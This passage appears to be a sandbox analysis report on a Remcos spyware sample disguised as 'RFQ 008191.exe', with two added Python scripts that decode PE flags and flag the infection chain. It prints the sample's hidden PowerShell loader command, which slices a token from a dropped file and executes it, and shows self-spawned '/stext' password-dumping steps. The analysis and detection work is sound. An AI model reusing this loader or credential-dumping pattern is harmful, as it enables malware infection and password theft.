              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 15_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 15_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard

              E-Banking Fraud

              Source: Yara match | File source: 0000000B.00000002.2512739628.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: Juryen.exe PID: 7864, type: MEMORYSTR
              Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              System Summary

              Source: initial sample | Static PE information: Filename: RFQ 008191.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Juryen.exe
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_00401806 NtdllDefWindowProc_W
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_004018C0 NtdllDefWindowProc_W
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_004016FD NtdllDefWindowProc_A
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_004017B7 NtdllDefWindowProc_A
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 15_2_00402CAC NtdllDefWindowProc_A
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 15_2_00402D66 NtdllDefWindowProc_A
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Code function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 11_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Code function: 0_2_00406C5F
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 11_2_00406C5F
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 11_2_1F75B5C1
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 11_2_1F767194
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_0044B040
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_0043610D
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_00447310
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_0044A490
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_0040755A
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_0043C560
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_0044B610
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_0044D6C0
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_004476F0
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_0044B870
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_0044081D
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_00414957
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_004079EE
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_00407AEB
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_0044AA80
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_00412AA9
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_00404B74
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_00404B03
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_0044BBD8
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_00404BE5
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_00404C76
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_00415CFE
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_00416D72
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_00446D30
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_00446D8B
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_00406E8F
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_00405038
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_0041208C
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_004050A9
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_0040511A
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_0043C13A
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_004051AB
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_00449300
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_0040D322
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_0044A4F0
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_0043A5AB
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_00413631
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_00446690
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_0044A730
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_004398D8
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_004498E0
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_0044A886
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_0043DA09
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_00438D5E
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_00449ED0
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_0041FE83
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_00430F54
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 15_2_004050C2
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 15_2_004014AB
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 15_2_00405133
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 15_2_004051A4
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 15_2_00401246
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 15_2_0040CA46
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 15_2_00405235
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 15_2_004032C8
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 15_2_004222D9
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 15_2_00401689
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 15_2_00402F60
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: String function: 004169A7 appears 87 times
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: String function: 0044DB70 appears 41 times
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: String function: 004165FF appears 35 times
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: String function: 00422297 appears 42 times
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: String function: 00444B5A appears 37 times
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: String function: 00413025 appears 79 times
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: String function: 00416760 appears 69 times
              Source: RFQ 008191.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engine | Classification label: mal100.phis.troj.spyw.evad.winEXE@12/17@1/3
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Code function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 11_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 15_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Code function: 0_2_004049B1 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Code function: 0_2_004021CF CoCreateInstance
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_03
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-HSAM04
              Source: C:\Users\user\Desktop\RFQ 008191.exe | File created: C:\Users\user~1\AppData\Local\Temp\nseB31A.tmp
              Source: RFQ 008191.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
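The two "Static PE information" rows for RFQ 008191.exe list the COFF file characteristics and the .text section flags by name. The decoder below is an added example written for this page, not Joe Sandbox code and not part of the sample: it parses a PE header with struct, prints those same names in the order the report uses, and then flags the two conditions an analyst actually cares about. RELOCS_STRIPPED on an executable means the loader cannot rebase the image, so it runs at its preferred base without ASLR; a section that is both writable and executable is the usual footprint of an in-place unpacker stub. The header bytes are constructed inline from the flag values the report lists; the second section (".stub", RWX) is a hypothetical addition to exercise the second check, the report lists only .text.

```python
import struct

# COFF file-header Characteristics bits (PE/COFF specification).
FILE_CHARACTERISTICS = {
    0x0001: 'RELOCS_STRIPPED',
    0x0002: 'EXECUTABLE_IMAGE',
    0x0004: 'LINE_NUMS_STRIPPED',
    0x0008: 'LOCAL_SYMS_STRIPPED',
    0x0020: 'LARGE_ADDRESS_AWARE',
    0x0100: '32BIT_MACHINE',
    0x0200: 'DEBUG_STRIPPED',
    0x2000: 'DLL',
}
# Section-header Characteristics bits.
SECTION_CHARACTERISTICS = {
    0x00000020: 'IMAGE_SCN_CNT_CODE',
    0x00000040: 'IMAGE_SCN_CNT_INITIALIZED_DATA',
    0x00000080: 'IMAGE_SCN_CNT_UNINITIALIZED_DATA',
    0x20000000: 'IMAGE_SCN_MEM_EXECUTE',
    0x40000000: 'IMAGE_SCN_MEM_READ',
    0x80000000: 'IMAGE_SCN_MEM_WRITE',
}


def decode_flags(value, table):
    """Names of the set bits, in ascending bit order (the order the report prints them)."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe(data):
    """Return (file Characteristics, [(section name, section Characteristics), ...])."""
    if data[:2] != b'MZ':
        raise ValueError('missing MZ header')
    (e_lfanew,) = struct.unpack_from('<I', data, 0x3C)      # offset of "PE\0\0"
    if data[e_lfanew:e_lfanew + 4] != b'PE\0\0':
        raise ValueError('missing PE signature')
    coff = e_lfanew + 4                                     # 20-byte COFF header follows the signature
    _machine, nsections, _ts, _symtab, _nsyms, opt_size, chars = \
        struct.unpack_from('<HHIIIHH', data, coff)
    first_section = coff + 20 + opt_size                    # section table follows the optional header
    sections = []
    for i in range(nsections):
        off = first_section + 40 * i                        # IMAGE_SECTION_HEADER is 40 bytes
        name = data[off:off + 8].rstrip(b'\0').decode('ascii', 'replace')
        (sec_chars,) = struct.unpack_from('<I', data, off + 36)  # Characteristics is the last field
        sections.append((name, sec_chars))
    return chars, sections


def assess(data):
    """Decode the flag names and return the findings a triage analyst cares about."""
    chars, sections = parse_pe(data)
    findings = []
    if chars & 0x0001 and chars & 0x0002 and not chars & 0x2000:
        findings.append('RELOCS_STRIPPED executable: cannot be rebased, so it runs without ASLR')
    for name, sc in sections:
        if sc & 0x80000000 and sc & 0x20000000:
            findings.append(f'{name}: writable and executable section (in-place unpacking / self-modifying code)')
    file_flags = decode_flags(chars, FILE_CHARACTERISTICS)
    section_flags = {name: decode_flags(sc, SECTION_CHARACTERISTICS) for name, sc in sections}
    return file_flags, section_flags, findings


def build_header(file_chars, sections):
    """Constructed test input: a headers-only PE image (no code), enough for the parser above."""
    dos = bytearray(64)
    dos[:2] = b'MZ'
    struct.pack_into('<I', dos, 0x3C, 64)                   # e_lfanew: PE header right after the DOS header
    coff = struct.pack('<HHIIIHH', 0x014C, len(sections), 0, 0, 0, 0, file_chars)  # 0x014C = i386
    image = bytes(dos) + b'PE\0\0' + coff                   # SizeOfOptionalHeader = 0 for this stub
    for name, sc in sections:
        image += struct.pack('<8sIIIIIIHHI', name.encode(), 0, 0x1000, 0, 0, 0, 0, 0, 0, sc)
    return image


# Constructed sample: the flags this report lists for RFQ 008191.exe (0x010F, .text = 0x60000020)
# plus a hypothetical RWX ".stub" section the report does not list, to exercise the second check.
SAMPLE = build_header(0x010F, [('.text', 0x60000020), ('.stub', 0xE0000020)])

if __name__ == '__main__':
    flags, secs, notes = assess(SAMPLE)
    print('file:', ', '.join(flags))
    for sec_name, sec_flags in secs.items():
        print(f'section {sec_name}:', ', '.join(sec_flags))
    for note in notes:
        print('finding:', note)
```

Running it against a real file is `assess(open(path, 'rb').read())`; the parser deliberately reads only the COFF header and section table, so it works on a truncated or headers-only dump as well as on a complete image.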
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | System information queried: HandleInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
              Source: C:\Users\user\Desktop\RFQ 008191.exe | File read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: Juryen.exe, Juryen.exe, 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: Juryen.exe, Juryen.exe, 0000000E.00000002.1879304771.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: Juryen.exe, 0000000B.00000002.2542497017.000000001F630000.00000040.10000000.00040000.00000000.sdmp, Juryen.exe, 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: Juryen.exe, Juryen.exe, 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: Juryen.exe, Juryen.exe, 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: Juryen.exe, Juryen.exe, 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: Juryen.exe, 0000000D.00000003.1904920514.0000000000979000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000D.00000002.1906158159.0000000000979000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Juryen.exe, Juryen.exe, 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: RFQ 008191.exe | ReversingLabs: Detection: 18%
              Source: C:\Users\user\Desktop\RFQ 008191.exe | File read: C:\Users\user\Desktop\RFQ 008191.exe
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Evasive API call chain: __getmainargs,DecisionNodes,exitgraph_14-33208
              Source: unknown | Process created: C:\Users\user\Desktop\RFQ 008191.exe "C:\Users\user\Desktop\RFQ 008191.exe"
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Juryen.exe "C:\Users\user~1\AppData\Local\Temp\Juryen.exe"
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Process created: C:\Users\user\AppData\Local\Temp\Juryen.exe C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\dcokdpgzihxxnj"
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Process created: C:\Users\user\AppData\Local\Temp\Juryen.exe C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\owccehyavpqcxpshx"
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Process created: C:\Users\user\AppData\Local\Temp\Juryen.exe C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\yyhnfajurxihaeglgsaa"
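The process chain above is the whole infection in four rows: a hidden PowerShell reads Beruse.Rob with gc -raw, slices a three-character token out of it with SubString(48853,3) and invokes that token as a command with the call operator; the PowerShell then drops and starts Juryen.exe; Juryen.exe launches three copies of itself with /stext and a random-named output file, which is the NirSoft command-line switch for writing recovered passwords to a text file (the nirsoft.net strings earlier in this section come from those embedded tools). Together with the Rmc-HSAM04 mutex and the dropped C:\ProgramData\remcos\logs.dat from the Yara rows, that is enough to write a small triage script. The script below is an added example written for this report, not Joe Sandbox code and not part of the sample; the event list is copied from the rows above, and the assumption that the three-character slice is a cmdlet or alias name is not confirmed by the report, which does not show the contents of Beruse.Rob. The detection therefore keys on the shape of the command line, not on the token's value.

```python
import re

# Constructed input: the "Process created", "Mutant created" and Yara "DROPPED" rows of this
# report, copied into (parent image, child command line) tuples. Parent None = the initial launch.
PROCESS_EVENTS = [
    (None, r'"C:\Users\user\Desktop\RFQ 008191.exe"'),
    (r'C:\Users\user\Desktop\RFQ 008191.exe',
     r'powershell.exe -windowstyle hidden "$Prmierer=gc -raw '
     r"'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';"
     r'$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer)'),
    (r'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe',
     r'C:\Windows\system32\conhost.exe 0xffffffff -ForceV1'),
    (r'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe',
     r'"C:\Users\user~1\AppData\Local\Temp\Juryen.exe"'),
    (r'C:\Users\user\AppData\Local\Temp\Juryen.exe',
     r'C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\dcokdpgzihxxnj"'),
    (r'C:\Users\user\AppData\Local\Temp\Juryen.exe',
     r'C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\owccehyavpqcxpshx"'),
    (r'C:\Users\user\AppData\Local\Temp\Juryen.exe',
     r'C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\yyhnfajurxihaeglgsaa"'),
]
MUTEXES = [
    r'\Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_03',
    r'\Sessions\1\BaseNamedObjects\Rmc-HSAM04',
]
DROPPED = [r'C:\ProgramData\remcos\logs.dat']

# Loader pattern: hidden PowerShell reads a file with "gc -raw", slices a short token out of it with
# SubString(offset, length) and runs that token as a command with the call operator (".$var(...)").
# The report does not show Beruse.Rob, so what the three characters are is an assumption; the
# match is on the shape of the command line only.
LOADER_RE = re.compile(
    r'-windowstyle\s+hidden.*?\bgc\s+-raw\b.*?\.SubString\((\d+),\s*(\d+)\).*?\.\$\w+\(',
    re.IGNORECASE | re.DOTALL)


def loader_slice(cmdline):
    """(offset, length) of the SubString call if the line matches the loader pattern, else None."""
    m = LOADER_RE.search(cmdline)
    return (int(m.group(1)), int(m.group(2))) if m else None


# Credential-theft pattern: a process launches a copy of its own image with '/stext <file>', the
# NirSoft switch for dumping recovered passwords to a text file. Remcos does this with the
# recovery tools it carries, one child per tool.
STEXT_RE = re.compile(r'/stext\s+"([^"]+)"', re.IGNORECASE)


def _basename(path):
    return path.strip('"').replace('/', '\\').rsplit('\\', 1)[-1].lower()


def stext_output(parent, cmdline):
    """Output file of a /stext self-spawn, or None. Compares image names only, because the report
    shows the child through the 8.3 short path (user~1) and the parent through the long one."""
    m = STEXT_RE.search(cmdline)
    if not m or parent is None:
        return None
    child_image = cmdline.split(' /stext', 1)[0]
    return m.group(1) if _basename(child_image) == _basename(parent) else None


def triage(events=PROCESS_EVENTS, mutexes=MUTEXES, dropped=DROPPED):
    """Run every check and return (label, detail) findings in report order."""
    findings = []
    for parent, cmdline in events:
        s = loader_slice(cmdline)
        if s:
            findings.append(('powershell_substring_loader', s))
        out = stext_output(parent, cmdline)
        if out:
            findings.append(('stext_self_spawn', out))
    for m in mutexes:
        name = m.rsplit('\\', 1)[-1]
        if name.startswith('Rmc-'):            # "Rmc-" + random suffix is Remcos' default mutex naming
            findings.append(('remcos_mutex', name))
    for path in dropped:
        if path.lower().endswith(r'\remcos\logs.dat'):   # Remcos keylog / offline log file
            findings.append(('remcos_keylog', path))
    return findings


if __name__ == '__main__':
    for label, detail in triage():
        print(f'{label}: {detail}')
```

The /stext check compares the child's image name with the parent's rather than the full path on purpose: Joe Sandbox prints the child through the 8.3 short path (user~1) and the parent through the long one, and a string comparison on the whole path would miss all three rows. The same pair of checks maps directly onto Sysmon event ID 1 (process creation) fields, with ParentImage and CommandLine in place of the tuples used here.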
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Section loaded: propsys.dll
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Section loaded: dwmapi.dll
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Section loaded: oleacc.dll
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Section loaded: ntmarta.dll
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Section loaded: shfolder.dll
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Section loaded: riched20.dll
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Section loaded: usp10.dll
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Section loaded: msls31.dll
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Section loaded: textinputframework.dll
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Section loaded: coreuicomponents.dll
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Section loaded: coremessaging.dll
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Section loaded: coremessaging.dll
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Section loaded: wintypes.dll
